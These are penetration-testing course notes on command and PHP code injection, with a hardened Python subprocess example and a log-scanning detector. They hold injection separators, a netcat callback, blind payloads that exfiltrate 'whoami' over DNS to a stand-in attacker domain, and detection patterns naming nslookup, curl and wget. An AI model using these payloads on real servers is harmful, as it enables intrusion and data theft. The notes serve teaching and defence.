eWPTXv3 - Notes

4.1 Command Injection

Command Injection

Command Injection vulnerabilities, in the context of web application penetration testing, occur when an attacker can manipulate input fields of a web app in a way that allows them to execute OS commands on the underlying server.

This vulnerability is a serious security risk because it can lead to unauthorized access, data theft, and full compromise of the web server.

The main causes of this vulnerability are:

  • User Input Handling: web apps often take user input through forms, query parameters, headers, etc.

  • Lack of Input Sanitization: an insecurely coded app may fail to properly validate, sanitize or escape user input before passing it to a system shell.

  • Injection Points: attackers identify injection points such as input fields or URL query parameters where they can insert malicious commands.

Exploitation

  • Attackers exploit it by crafting malicious input that includes special characters like ; | \ and other shell metacharacters to break out of the intended input context and inject their own commands.

  • When the app processes the attacker's input, it constructs a shell command string using the malicious input.

  • The server, treating the command as legitimate, executes it on the underlying OS.

Attackers can then execute arbitrary commands with the privileges of the web server process, potentially leading to unauthorized data access and exfiltration, code execution or system compromise: manipulating the server, installing malware or creating backdoors for future access.
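The root cause described above, a user value spliced into a shell command string, is easiest to see next to its fix. The following is an added example (not code from the notes): a vulnerable builder that mirrors the unsafe pattern, and a hardened version that validates the value and passes it as a single argv element with no shell involved. The sample inputs, the hostname policy and the function names are assumptions of this example.

```python
import re
import shlex
import subprocess
from ipaddress import ip_address

# Constructed inputs (not from the notes): one benign host and one carrying
# the ';' separator described above. The injected one is never executed here.
BENIGN_HOST = "127.0.0.1"
INJECTED_HOST = "127.0.0.1; id"

# Assumed hostname policy for this example: labels of letters, digits and
# hyphens joined by dots. Prefer an explicit allow-list where the app can.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_vulnerable_command(host: str) -> str:
    """The unsafe pattern: user input spliced into one shell string.
    Returned, not run: with shell=True the shell would treat the ';' in
    INJECTED_HOST as the end of 'ping' and start a second command."""
    return f"ping -c 1 {host}"


def is_valid_host(host: str) -> bool:
    """Accept an IP literal or a syntactically valid hostname, nothing else."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def build_hardened_argv(host: str) -> list[str]:
    """Validate first, then pass the value as its own argv element. With an
    argv list there is no shell to interpret separators or substitutions."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["ping", "-c", "1", host]


def run_hardened(host: str) -> int:
    """shell=False (the default) hands argv straight to the OS; the user
    value can only ever be the ping target, never a command."""
    return subprocess.run(build_hardened_argv(host), check=False).returncode


def quote_for_shell(host: str) -> str:
    """Fallback when a shell truly is unavoidable: shlex.quote wraps the
    whole value in single quotes so metacharacters lose their meaning."""
    return f"ping -c 1 {shlex.quote(host)}"


if __name__ == "__main__":
    print(build_vulnerable_command(INJECTED_HOST))   # second command appended
    print(build_hardened_argv(BENIGN_HOST))          # argv list, no shell
    print(quote_for_shell(INJECTED_HOST))            # quoted, single argument
```

The argv form is the primary fix; validation on top of it keeps the value within what the feature actually needs. Quoting is shown only as the fallback for code that cannot drop the shell, since quoting must be applied on every path and is easy to miss.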

PHP Code Injection

PHP Code Injection, also known as a PHP Code Execution vulnerability, occurs when an attacker can inject and execute arbitrary PHP code within a web app.

It is similar to generic command injection but concerns only PHP code. It still allows attackers to gain unauthorized access to the server, execute malicious actions and potentially compromise the web app.

Example

In an upload form we can upload a file and append this payload to the end of the URL:

; id to display the id and information of the user the web server runs as on the machine.

If the web app doesn't respond, it may not be vulnerable or it may have a blind command injection; in that case we can put ourselves in listening mode with netcat: nc -nvlp 4444, then use ;nc <attacker_machine> 4444 and see whether the web app reaches out to our attacker machine.

Ways of injecting OS commands

  • &
  • &&
  • |
  • ||
  • ;
  • Newline (0x0a or \n)
  • `injected command` (backticks: inline command substitution)
  • $(injected command) (command substitution)

Useful commands

| Purpose of command    | Linux      | Windows       |
|-----------------------|------------|---------------|
| Name of current user  | whoami     | whoami        |
| Operating system      | uname -a   | ver           |
| Network configuration | ifconfig   | ipconfig /all |
| Network connections   | netstat -an | netstat -an  |
| Running processes     | ps -ef     | tasklist      |

Blind OS command injection vulnerabilities

# blind OS command injection using time delays
& ping -c 10 127.0.0.1 &

# blind OS command injection by redirecting output
& whoami > /var/www/static/whoami.txt &

# blind OS command injection using out-of-band (OAST) techniques
& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
# resulting DNS query observed on the out-of-band domain:
wwwuser.kgji2ohoyw.web-attacker.com
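From the defending side, the separator list above and the three blind techniques (time delay, output redirection, out-of-band lookup) are also what an access-log detection should key on. The following is an added example, not part of the notes: it parses constructed access-log lines, decodes each query value and flags requests whose values carry a separator, labelling which blind technique the payload resembles. The log lines, the regex signatures and the function names are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real traffic). The first two are
# benign; the other three carry the three blind-injection styles listed above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?host=127.0.0.1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?host=127.0.0.1&count=3 HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /ping?host=127.0.0.1%26+ping+-c+10+127.0.0.1+%26 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /ping?host=x%26+whoami+%3E+/var/www/static/whoami.txt+%26 HTTP/1.1" 200 512
10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "GET /ping?host=x%26+nslookup+%60whoami%60.kgji2ohoyw.web-attacker.com+%26 HTTP/1.1" 200 512
"""

# Common log format: client ip, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The separators from the "Ways of injecting OS commands" list.
SEPARATORS = re.compile(r"&&|\|\||\$\(|[&|;`\n]")

# Signatures for the three blind techniques: induce a delay, write output to
# a web-reachable file, or trigger an outbound lookup/request.
TECHNIQUES = [
    ("time-delay", re.compile(r"\b(?:ping\s+-c\s+\d+|sleep\s+\d+|timeout\s+\d+)\b")),
    ("output-redirect", re.compile(r">\s*/\S+")),
    ("out-of-band", re.compile(r"\b(?:nslookup|dig|curl|wget)\s+\S+")),
]


def decoded_query_values(path):
    """Split the query on raw '&' first, then decode each value, so an
    encoded %26 inside a value is inspected while the real parameter
    separator is not mistaken for an injected one."""
    query = urlsplit(path).query
    return [v for values in parse_qs(query, keep_blank_values=True).values() for v in values]


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    for value in decoded_query_values(m["path"]):
        seps = sorted(set(SEPARATORS.findall(value)))
        if not seps:
            continue
        techniques = [name for name, rx in TECHNIQUES if rx.search(value)]
        return {"ip": m["ip"], "path": m["path"], "separators": seps, "techniques": techniques}
    return None


def scan_log(text):
    """Scan every line; keep only the requests that produced a finding."""
    return [f for f in (analyse_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["separators"], finding["techniques"])
```

Decoding after splitting on the raw parameter separator is the detail that keeps the `&`-based patterns from flagging every multi-parameter request. A separator hit with no technique label is still reported, since the payload shapes above are only the best-known ones; for the out-of-band case the DNS logs of the resolver the server uses are the complementary data source.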

Practice

There's a dedicated module in the bWAPP vulnerable web app.
